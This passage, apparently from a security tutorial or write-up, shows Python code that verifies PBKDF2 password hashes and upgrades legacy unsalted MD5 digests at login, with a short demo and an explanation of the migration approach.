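    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login(user_row, password):
    """Check the password; if the row still holds a legacy MD5, upgrade it in place."""
    stored = user_row["password"]
    if looks_like_unsalted_md5(stored):
        ok = hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored)
        if ok:
            user_row["password"] = hash_password(password)   # transparent migration
        return ok
    return verify_password(password, stored)


if __name__ == "__main__":
    row = {"login": "admin", "password": DUMPED_HASH}       # constructed row from the dump
    print("legacy format:", looks_like_unsalted_md5(row["password"]))
    print("found in wordlist:", weak_hash_in_wordlist(row["password"], WORDLIST))
    print("login ok:", login(row, "P4ssw0rd"))
    print("now stored as:", row["password"][:30] + "...")
```

The migration in `login` is the practical fix for a live table: the plaintext is only available at login time, so the legacy digest is replaced the first time each user authenticates, and the audit function tells you how many rows are still waiting.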
